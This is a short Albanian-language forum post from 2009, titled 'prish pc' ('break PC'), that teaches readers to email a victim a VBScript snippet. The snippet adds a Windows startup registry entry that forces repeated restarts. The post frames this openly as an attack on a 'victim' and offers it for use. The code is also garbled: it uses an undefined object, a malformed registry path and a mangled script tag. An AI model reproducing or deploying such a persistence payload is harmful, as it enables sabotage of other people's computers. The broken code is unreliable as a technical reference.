ForumCalendarGalleryPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 prish pc

Shko poshtë 
AutoriMesazh
ideal.,-->Numri i postimeve : 23
Join date : 18/01/2009

MesazhTitulli: prish pc   Sun Jan 18, 2009 1:30 am

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

</SCRIPT>
--------------------------------------------------------------------------
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pak me nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin! per 24 sekonda do ti shymet View High Resolution
Order Prints & Gifts
Create Your Own Site
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
prish pc
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Anë të mira dhe më shumë pasoja negative

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
( ( KsT-GrouP ) ) :: Panelli i Kontrollit :: Tutorials & Mësime-
Kërce tek: